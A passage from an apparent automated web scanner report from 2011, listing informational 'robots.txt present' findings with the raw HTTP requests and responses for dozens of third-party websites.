Content-Length: 69
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# All robots will spider the domain
User-agent: *
Disallow: /radar/

27.189. http://www.beautyschool.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyschool.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beautyschool.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:17:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 21 Mar 2011 14:25:39 GMT
ETag: "dc8a7-21-49efee6dd7ec0"
Accept-Ranges: bytes
Content-Length: 33
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /mobile/

27.190. http://www.bebo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bebo.com

Response

HTTP/1.0 200 OK
Server: Resin/3.0.24
ETag: "GU6VXElTrrv"
Last-Modified: Wed, 17 Mar 2010 18:31:39 GMT
Content-Type: text/plain
Date: Wed, 04 May 2011 00:49:49 GMT
Content-Length: 365
Connection: close

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /SupportTicket.jsp
Disallow: /Friends.jsp
Disallow: /LostPasswordReset.jsp
Disallow: /CancelMembership.jsp
Disallow: /NoNewsl
...[SNIP]...

27.191. http://www.beckershospitalreview.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beckershospitalreview.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beckershospitalreview.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Wed, 18 Aug 2010 20:57:56 GMT
ETag: "1150044-38a-48e1f51e5fd00"
Accept-Ranges: bytes
Content-Length: 906
Connection: close
Content-Type: text/plain

User-agent: Googlebot-News
Allow: /hospital-physician-relationships/*
Allow: /compensation-issues/*
Allow: /hospital-leadership-and-executive-moves/*
Allow: /hospital-transactions-and-valuation-issues
...[SNIP]...

27.192. http://www.becomehealthynow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.becomehealthynow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.becomehealthynow.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:41:52 GMT
Server: Apache/2.2.14
Last-Modified: Sun, 09 May 2010 03:39:14 GMT
ETag: "415a-48621093edc80"
Accept-Ranges: bytes
Content-Length: 16730
Connection: close
Content-Type: text/plain

# User-agent: *
# User-agent: Googlebot-Image
# Disallow: / # The above 2 lines prevents google from indexing ANY images on the site to prevent bandwidth excess. Remove the # to allow prevent indexing
...[SNIP]...

27.193. http://www.beep.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beep.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beep.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:18 GMT
Server: Apache
Last-Modified: Thu, 30 Sep 2010 13:00:41 GMT
ETag: "23a076-7d-49179aa4bb040"
Accept-Ranges: bytes
Content-Length: 125
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /hp/
Disallow: /bilderarchiv/
Disallow: /hptemplates/
Disallow: /credits.html
Disallow: /imprint.html

27.194. http://www.belcan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.belcan.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.belcan.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:39:12 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Wed, 16 Sep 2009 13:55:25 GMT
ETag: "61e845-1d5-473b2402e6d40"
Accept-Ranges: bytes
Content-Length: 469
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Di
...[SNIP]...

27.195. http://www.beloblog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beloblog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beloblog.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/4.4.9
Last-Modified: Tue, 09 Mar 2010 08:10:39 GMT
ETag: "a34825c-44-48159b7965dc0"
Accept-Ranges: bytes
Content-Length: 68
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /tmp/

27.196. http://www.bendoverbabe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bendoverbabe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bendoverbabe.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:57:42 GMT
Server: Apache
X-Pingback: http://www.bendoverbabe.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 77
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.bendoverbabe.com/sitemap.xml.gz

27.197. http://www.benihana.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.benihana.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.benihana.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b PHP/5.2.6
Last-Modified: Tue, 25 Jan 2011 19:11:24 GMT
ETag: "1b0797-7c2-49ab07b83cf00"
Accept-Ranges: bytes
Content-Length: 1986
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.1.1.1 2008/07/14 20:11:19 mduncan Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run
...[SNIP]...

27.198. http://www.benningtonbanner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.benningtonbanner.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.benningtonbanner.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 05 Aug 2009 22:15:35 GMT
ETag: "80ddf411a16ca1:11f3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-encoding
Expires: Wed, 04 May 2011 01:10:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:10:32 GMT
Content-Length: 123
Connection: close

User-agent: *
Disallow: /portlet/
Disallow: /circare/
Crawl-delay: 5

Sitemap: http://www.benningtonbanner.com/sitemap.xml

27.199. http://www.benzworld.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.benzworld.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.benzworld.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:00 GMT
Server: Apache
Last-Modified: Tue, 04 Jul 2006 17:55:31 GMT
Accept-Ranges: bytes
Content-Length: 1063
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admincp/
Disallow: /cgi-bin/
Disallow: /clientscript/
Disallow: /includes/
Disallow: /install/
Disallow: /gallery/showmembers.php
Disallow: /gallery/misc.php
Disallow: /galler
...[SNIP]...

27.200. http://www.bestbedguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bestbedguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bestbedguide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:34:31 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 08 Nov 2010 21:02:04 GMT
ETag: "4149872-1a6-49490efaaeb00"
Accept-Ranges: bytes
Content-Length: 422

Sitemap: http://www.bestbedguide.com/sitemap_index.xml
User-agent: *
Disallow: /autocomplete/
Disallow: /search
Disallow: /static/
Allow: /static/_cache/
Disallow: /register/
Disallow: /signin/
Disall
...[SNIP]...

27.201. http://www.bestofvegas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bestofvegas.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bestofvegas.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 27 Apr 2011 22:23:11 GMT
ETag: "2f03e8-1a-4a1ede2c931c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent:*
Disallow:/*?

27.202. http://www.bestps3themes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bestps3themes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bestps3themes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:51:52 GMT
Server: Apache
X-Pingback: http://www.bestps3themes.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=459717bbe6af15114703360e77c79252; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.203. http://www.betterflashgames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.betterflashgames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.betterflashgames.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 21 Mar 2011 02:15:23 GMT
ETag: "8da001b-cc-49ef4b33a64c0"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.204. http://www.bezbrige.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bezbrige.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bezbrige.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 03:48:12 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Sat, 06 Feb 2010 22:39:00 GMT
ETag: "1e11166-130-47ef63bf7e900"
Accept-Ranges: bytes
Content-Length: 304

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.205. http://www.biblelookup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.biblelookup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.biblelookup.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:05:08 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 25 Jan 2008 01:07:12 GMT
ETag: "50b1159eee5ec81:aed"
Content-Length: 70

User-agent: *
Disallow: /

User-agent: ia_archiver
Disallow: /


27.206. http://www.bigbrother-24hourlive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigbrother-24hourlive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigbrother-24hourlive.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:58:37 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 23 Jul 2008 21:09:33 GMT
ETag: "1b70815e-76-452b75b69dd40"
Accept-Ranges: bytes
Content-Length: 118
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stats/
Disallow: /cgi-bin/
Disallow: /_images/
Disallow: /_templates/
Disallow: /real/

27.207. http://www.bigbrotheraccess.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigbrotheraccess.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigbrotheraccess.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:44:18 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Connection: close
Content-Type: text/plain; charset=UTF-8

#######################################################
# iRobots.txt SEO

# All Bots
User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Disallow: /re
...[SNIP]...

27.208. http://www.bigclickr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigclickr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigclickr.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:19 GMT
Server: Apache
Last-Modified: Tue, 04 Aug 2009 01:41:00 GMT
Accept-Ranges: bytes
Content-Length: 109
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /


27.209. http://www.bigdeal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigdeal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigdeal.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:08:03 GMT
Server: Apache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: BigDeal_Host=%22www%22; path=/; domain=.bigdeal.com; httponly
Set-Cookie: BigDeal=%222cea4310a847cf6f84594a726ff76062%22; path=/; domain=.bigdeal.com; httponly
Set-Cookie: BigDealBrowserID=%222cea4310a847cf6f84594a726ff76062%22; expires=Sat, 01-May-2021 02:08:03 GMT; path=/; domain=.bigdeal.com
Set-Cookie: fbuniq=%222-7d99d7d4-4f94-4769-9ad0-bb9ad822f35c%22; expires=Sat, 01-May-2021 02:08:03 GMT; path=/; domain=.bigdeal.com; httponly
Set-Cookie: visit=-1; expires=Thu, 03-May-2012 02:08:03 GMT; path=/; domain=.bigdeal.com
Set-Cookie: BigDeal_Tracking=%7B%22source%22%3A%22%22%2C%22medium%22%3A%22%22%2C%22term%22%3A%22%22%2C%22content%22%3A%22%22%2C%22campaign%22%3A%22%22%2C%22gclid%22%3A%22%22%2C%22partnerid%22%3A%22%22%7D; expires=Wed, 11-May-2011 02:08:03 GMT; path=/; domain=.bigdeal.com; httponly
Set-Cookie: fbloggedin=false; expires=Wed, 04-May-2011 01:08:03 GMT; path=/; domain=.bigdeal.com; httponly
Vary: Accept-Encoding
Content-Length: 84
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /settings
Disallow: /purchase
Disallow: /interface
Allow: /

27.210. http://www.biggamedownloads.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.biggamedownloads.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.biggamedownloads.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:54:10 GMT
Server: Apache
Last-Modified: Sun, 14 Feb 2010 21:20:41 GMT
Accept-Ranges: bytes
Content-Length: 105
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 15
Disallow: /cgi-bin/
Disallow: go.php
Disallow: /*/go.php
Disallow: /*/*.php

27.211. http://www.bigpawsonly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigpawsonly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigpawsonly.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:46 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Mon, 17 Jul 2006 16:23:50 GMT
ETag: "2ea34f-36-418c974911180"
Accept-Ranges: bytes
Content-Length: 54
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/

27.212. http://www.birthdatabase.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.birthdatabase.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.birthdatabase.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:13 GMT
Server: Apache/1.3.41 (Unix) mod_evasive/2.1 PHP/5.2.13
Last-Modified: Tue, 01 Apr 2008 15:20:39 GMT
ETag: "69-47f252c7"
Accept-Ranges: bytes
Content-Length: 105
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /php/
Disallow: /usage/
Disallow: /logs/


27.213. http://www.bizactions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizactions.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizactions.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 20 Apr 2011 07:11:33 GMT
ETag: "24f144a-192-55a45340"
Accept-Ranges: bytes
Content-Length: 402
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /actionfiles/
Disallow: /primarytemplatefiles/
Disallow: /admin/
Disallow: /authors/
Disallow: /compliance/
Disallow: /contentcenter/
Disallow: /cronjobs/
Disallow: /joetest/
D
...[SNIP]...

27.214. http://www.bizbash.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizbash.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizbash.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:11:19 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 24 Nov 2010 02:31:50 GMT
ETag: "5e7b9de-5f-495c34a9ff180"
Accept-Ranges: bytes
Content-Length: 95
Connection: close
Content-Type: text/plain

User-Agent: *Sitemap: http://www.bizbash.com/sitemap_index.xmlDisallow: /search_directory.php

27.215. http://www.bizvotes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizvotes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizvotes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:36:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 28 Jul 2009 14:32:19 GMT
ETag: "ac10e4-193-f014a2c0"
Accept-Ranges: bytes
Content-Length: 403
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.bizvotes.com/sitemap.xml

User-agent: *
Disallow: /images/
Disallow: /vote/
Disallow: /includes/
Disallow: /maps/
Disallow: /about.php
Disallow: /contact.php
Disallow: /myaccount.p
...[SNIP]...

27.216. http://www.bjcraftsupplies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bjcraftsupplies.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bjcraftsupplies.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:10:38 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) mod_gzip/1.3.26.1a mod_fastcgi/2.4.6 mod_throttle/3.1.2 Chili!Soft-ASP/3.6.2 FrontPage/5.0.2.2635 mod_perl/1.31 PHP/4.4.9
Vary: *
Last-Modified: Tue, 29 Mar 2011 17:39:09 GMT
ETag: "6d5607-22-4d92193d"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /direct/


27.217. http://www.bjorn3d.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bjorn3d.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bjorn3d.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:17:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
Last-Modified: Sat, 13 Nov 2010 01:23:26 GMT
ETag: "770862-94-494e50dc0bf80"
Accept-Ranges: bytes
Content-Length: 148
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_siteadmin/
Disallow: /_admin/
Disallow: /openx/
Disallow: /_bjorn_tools/
Disallow: /_news/
Disallow: /_newsadmin/
Allow: /

27.218. http://www.bjsbrewhouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bjsbrewhouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bjsbrewhouse.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:09:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.5
Set-Cookie: SESS2c96bf4889636efd4e060357337024d4=39qr7sqq1d579jrakbtdrebv84; expires=Fri, 27 May 2011 04:42:22 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 01:09:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 1013
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /sites/
Disallow: /themes/
# Files
D
...[SNIP]...

27.219. http://www.blackberryrocks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackberryrocks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackberryrocks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:24:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8i mod_bwlimited/1.4
X-Pingback: http://blackberryrocks.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Set-Cookie: wpmp_switcher=desktop; expires=Thu, 03-May-2012 02:24:34 GMT; path=/
Set-Cookie: _percent_mobile_c=147129025317821_1304479474_1079886151328911; expires=Thu, 03-May-2012 02:24:34 GMT; path=/
Set-Cookie: PHPSESSID=b9ce9aaae899eca3f4399cb320199b84; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.220. http://www.blackbook2.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackbook2.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackbook2.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:51:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 17 Nov 2008 17:34:14 GMT
ETag: "1be04dd9-65-45be5fcd07180"
Accept-Ranges: bytes
Content-Length: 101
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /include/
Disallow: /design/
Disallow: /plugins/
Disallow: /site/



27.221. http://www.blacklight.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blacklight.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blacklight.com

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 04 May 2011 03:17:59 GMT
Connection: close
Content-Type: text/plain
Content-Length: 212
Last-Modified: Thu, 10 Aug 2006 18:38:02 GMT
Accept-Ranges: bytes
Expires: Thu, 05 May 2011 23:59:59 GMT
Cache-Control: max-age=3600
Pragma: Cache

User-agent: *
Disallow: /backroom/brorders.nsf/
Disallow: /orders/
Disallow: /gbook/
Disallow: /backroom/gbook.nsf/
Disallow: /viewcart
Disallow: awstats.blacklight.com

User-agent: Slurp
Cra
...[SNIP]...

27.222. http://www.bladeforums.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bladeforums.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bladeforums.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:10:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 23 Apr 2008 17:35:57 GMT
ETag: "90432e-30e-44b8dc3f61940"
Accept-Ranges: bytes
Content-Length: 782
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *

Disallow: /forums/archive/

Disallow: /forums/admincp/

Disallow: /forums/attachments/

Disallow: /forums/calendar.php

Disallow: /forums/clientscript/

Disallow: /forums/cpstyles/

Dis
...[SNIP]...

27.223. http://www.blanchardonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blanchardonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blanchardonline.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:50:19 GMT
Server: Apache/2.2.17 (FreeBSD)
Last-Modified: Fri, 29 May 2009 14:49:14 GMT
Accept-Ranges: bytes
Content-Length: 159
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /pdfs-ae/
Disallow: /search/results.php
Disallow: /coinshop/login.php
Disallow: /coinshop/checkout.php
Disallow: /request_information/

27.224. http://www.blastmagazine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blastmagazine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blastmagazine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:42:25 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 19:53:29 GMT
Accept-Ranges: bytes
Content-Length: 39
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Crawl-delay: 10

27.225. http://www.blick.ch/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blick.ch
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blick.ch

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 20 Oct 2010 16:21:13 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 935
X-Cacheable: YES
Date: Wed, 04 May 2011 02:56:29 GMT
Age: 0
Connection: close
X-Cache: MISS

# $ jac, 20101008

User-agent: *
Disallow: /suche
Disallow: /service/ads
Disallow: /service/ads2
Disallow: /service/ads3
Disallow: /service/showroom
Disallow: /service/showroom/video
Disallow
...[SNIP]...

27.226. http://www.blogchef.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogchef.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blogchef.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:49:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://blogchef.net/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.227. http://www.blogdelnarco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
